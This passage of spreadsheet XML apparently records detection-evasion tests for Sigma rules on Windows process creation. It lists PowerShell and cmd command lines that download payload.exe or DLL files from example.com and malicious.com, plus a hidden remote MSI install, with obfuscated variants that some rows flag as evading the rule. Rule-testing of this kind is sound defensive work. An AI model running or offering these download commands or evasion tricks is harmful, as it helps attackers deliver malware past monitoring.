          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C179" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D179" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E179" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /V:oN -"c" "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F179" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G179" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H179" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I179" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J179" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K179" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="180" ht="15.75" customHeight="1" s="42">
      <c r="A180" s="43" t="n"/>
      <c r="B180" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C180" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D180" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E180" s="4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180" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G180" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H180" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I180" s="4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180" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K180" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="181" ht="15.75" customHeight="1" s="42">
      <c r="A181" s="43" t="n"/>
      <c r="B181" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C181" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D181" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E181" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -W Hidden -C "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F181" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G181" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H181" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I181" s="43" t="n"/>
      <c r="J181" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K181" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="182" ht="15.75" customHeight="1" s="42">
      <c r="A182" s="43" t="n"/>
      <c r="B182" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C182" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D182" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E182" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -w Hidden -C "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F182" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G182" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H182" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I182" s="43" t="n"/>
      <c r="J182" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K182" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="183" ht="15.75" customHeight="1" s="42">
      <c r="A183" s="43" t="n"/>
      <c r="B183" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C183" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D183" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E183" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -W Hidden -c "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F183" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G183" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H183" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I183" s="43" t="n"/>
      <c r="J183" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K183" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="184" ht="15.75" customHeight="1" s="42">
      <c r="A184" s="43" t="n"/>
      <c r="B184" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C184" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D184" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E184" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F184" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G184" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H184" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I184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4" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K184" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="185" ht="15.75" customHeight="1" s="42">
      <c r="A185" s="43" t="n"/>
      <c r="B185" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C185" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D185" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E185" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMMand "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F185" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G185" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H185" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I185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5" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K185" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="186" ht="15.75" customHeight="1" s="42">
      <c r="A186" s="43" t="n"/>
      <c r="B186" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C186" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D186" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E186" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F186" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G186" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H186" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I186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6" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K186" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="187" ht="15.75" customHeight="1" s="42">
      <c r="A187" s="43" t="n"/>
      <c r="B187" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C187" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D187" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E187" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commAND "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F187" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G187" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H187" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I187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7" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K187" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="188" ht="15.75" customHeight="1" s="42">
      <c r="A188" s="43" t="n"/>
      <c r="B188" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C188" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D188" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E188" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMANd "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F188" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G188" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H188" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I188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8" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K188" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="189" ht="15.75" customHeight="1" s="42">
      <c r="A189" s="43" t="n"/>
      <c r="B189" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C189" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D189" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E189" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommAnd "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F189" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G189" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H189" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I189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89" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K189" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="190" ht="15.75" customHeight="1" s="42">
      <c r="A190" s="43" t="n"/>
      <c r="B190" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C190" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D190" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E190" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMand "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F190" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G190" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H190" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I190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190" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K190" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="191" ht="15.75" customHeight="1" s="42">
      <c r="A191" s="43" t="n"/>
      <c r="B191" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C191" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D191" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E191" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F191" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G191" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H191" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I191" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J191" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K191" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="192" ht="15.75" customHeight="1" s="42">
      <c r="A192" s="43" t="n"/>
      <c r="B192" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C192" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D192" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E192" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMMAnD "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F192" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G192" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H192" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I192" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J192" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K192" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="193" ht="15.75" customHeight="1" s="42">
      <c r="A193" s="43" t="n"/>
      <c r="B193" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C193" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D193" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E193" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMManD "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F193" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G193" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H193" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I193" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J193" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K193" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="194" ht="15.75" customHeight="1" s="42">
      <c r="A194" s="43" t="n"/>
      <c r="B194" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C194" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D194" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E194" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F194" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G194" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H194" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I194" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J194" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K194" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="195" ht="15.75" customHeight="1" s="42">
      <c r="A195" s="43" t="n"/>
      <c r="B195" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C195" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D195" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E195" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommaNd "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F195" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G195" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H195" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I195" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J195" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K195" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="196" ht="15.75" customHeight="1" s="42">
      <c r="A196" s="43" t="n"/>
      <c r="B196" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C196" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D196" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E196" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commaND "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F196" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G196" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H196" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I196" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J196" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K196" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="197" ht="15.75" customHeight="1" s="42">
      <c r="A197" s="43" t="n"/>
      <c r="B197" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C197" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D197" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E197" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F197" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G197" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H197" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I197" s="43" t="n"/>
      <c r="J197" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K197" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="198" ht="15.75" customHeight="1" s="42">
      <c r="A198" s="43" t="n"/>
      <c r="B198" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C198" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D198" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E198" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAnd "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F198" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G198" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H198" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I198" s="43" t="n"/>
      <c r="J198" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K198" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="199" ht="15.75" customHeight="1" s="42">
      <c r="A199" s="43" t="n"/>
      <c r="B199" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C199" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D199" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E199" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmANd "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F199" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G199" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H199" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I199" s="43" t="n"/>
      <c r="J199" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K199" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="200" ht="15.75" customHeight="1" s="42">
      <c r="A200" s="43" t="n"/>
      <c r="B200" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C200" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D200" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E200" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F200" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G200" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H200" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I200" s="43" t="n"/>
      <c r="J200" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K200" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="201" ht="15.75" customHeight="1" s="42">
      <c r="A201" s="43" t="n"/>
      <c r="B201" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C201" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D201" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E201" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComManD "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F201" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G201" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H201" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I201" s="43" t="n"/>
      <c r="J201" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K201" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="202" ht="15.75" customHeight="1" s="42">
      <c r="A202" s="43" t="n"/>
      <c r="B202" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C202" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D202" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E202" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F202" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G202" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H202" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I202" s="43" t="n"/>
      <c r="J202" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K202" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="203" ht="15.75" customHeight="1" s="42">
      <c r="A203" s="43" t="n"/>
      <c r="B203" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C203" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D203" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E203" s="44" t="inlineStr">
        <is>
          <t>powershell -c "(New-Object Net.WebClient).DownloadFile('http://malicious.com/payload.exe', 'C:\payload.exe')"</t>
        </is>
      </c>
      <c r="F203" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G203" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H203" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I203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03" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K203" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="204" ht="15.75" customHeight="1" s="42">
      <c r="A204" s="43" t="n"/>
      <c r="B204" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C204" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D204" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E204" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "(New-Object Net.WebClient).DownloadFile('http://malicious.com/payload.exe', 'C:\payload.exe')"</t>
        </is>
      </c>
      <c r="F204" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G204" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H204" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I204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04" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K204" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="205" ht="15.75" customHeight="1" s="42">
      <c r="A205" s="43" t="n"/>
      <c r="B205" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C205" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D205" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E205" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F205" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G205" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H205" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I205" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J205" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K205" s="44" t="b">
        <v>0</v>
      </c>
    </row>
